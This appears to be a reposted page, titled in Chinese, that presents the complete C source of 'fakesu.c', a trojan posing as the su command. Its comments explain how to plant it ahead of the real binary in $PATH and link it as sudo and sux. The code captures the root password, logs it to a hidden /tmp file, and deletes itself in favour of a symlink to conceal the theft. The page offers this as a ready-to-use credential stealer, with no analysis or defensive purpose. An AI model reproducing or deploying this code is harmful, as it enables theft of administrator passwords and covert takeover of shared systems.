记录su root帐号

#include
#include
#include
#include
#include
#include

/*

   [ fakesu.c ] 2oo6 by OOZIE
   ~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
   Simple /bin/su fake-proggy. Very useful if you have a shell
   with regular user rights, who uses from time to time su/sux/sudo
   to become a superuser.
  
   INSTALL
   ~~~~~~~
   If you can find ~/bin directories (e.g. SUSE Linux 10.1) which are
   located at the beginning of $PATH variable (EXTREMELY BAD IDEA!)
   in this case nothing simpler as:
  
   gcc fakesu.c -o ~/bin/su
   ln -s ~/bin/su ~/bin/sux     # just to be sure
   ln -s ~/bin/su ~/bin/sudo    # Carefully! sudo & su passwd propt differs!
                                  sudo: "Password:"
                    su: "Password: "
                                                  ^
   In any other case you have to create such a directory on your own
   and modify $PATH variable appropriately.
  
*/


#define LOG "/tmp/.pwds.log"  // change to hide stolen password somwhere else
#define SU "/bin/su"          // location of su can vary depending on a system

#ifdef CRYPTO          // ---[ OPTIONAL ENCRYPTION OF STOLEN PASSWORD ]---
#define CRYPT0 1       //    If compiled with -DCRYPTO, then CRYPT0=1
#endif                 //    -> stored password will be encrypted
#ifndef CRYPTO         //
#define CRYPT0 0       //    in any other case CRYPT0=0, plaintext (default)
#endif

/*

// This is not the part of this program, just a simple demo
// how the decryption algorithm for this proggie looks like.
// Copy & paste if needed

char *decrypt(char *string2) {
   int i;

   for(i=0;i < strlen(string2);i+=2)
      string2[i]--;
   for(i=1;i < strlen(string2);i+=2)
      string2[i]++;
  
   return string2;
  
}
*/

char *encrypt(char *string) {

   int i;

   for(i=0;i < strlen(string);i+=2)
      string[i]++;
   for(i=1;i < strlen(string);i+=2)
      string[i]--;
  
   return string;
}


int main(int argc, char **argv) {
   char passwd[256];
   char *path, *newpath, *token, *fullpath;
   struct stat *buf;
   FILE *pwdfile;
   int fd, lock=0;
  
   path=(char *)malloc(1024);
   newpath=(char *)malloc(1024);
   fullpath=(char *)malloc(256);  

   path=getenv("PATH");
   token=strtok(path,":");
  
   do {

      if (lock==0) {        // REMOVE binary su only by the first time
     
         strcpy(fullpath,token);
         strcat(fullpath,"/");       //
         strcat(fullpath,argv[0]);
     
         if (!(remove(fullpath))) {
        strcpy(newpath,fullpath);
        lock=1;
         }
     
      }

     
   } while (token=strtok(NULL, ":"));
  
                               // Very important - symbolic link must be made
   symlink(SU,newpath); // binary is gone. after the original Otherwise,
   // the victim executing su once again can see the full path to non-existent
   // trojan followed by an error message - we don't want that!
  
   strncpy(passwd,getpass("Password: "),256);
   pwdfile=fopen(LOG, "w");
    if (CRYPT0) encrypt(passwd);
    fprintf(pwdfile, "%s\n",passwd);
   fclose(pwdfile);

   sleep(3);
   printf("%s: incorrect password\n", argv[0]);
   return 0;  
}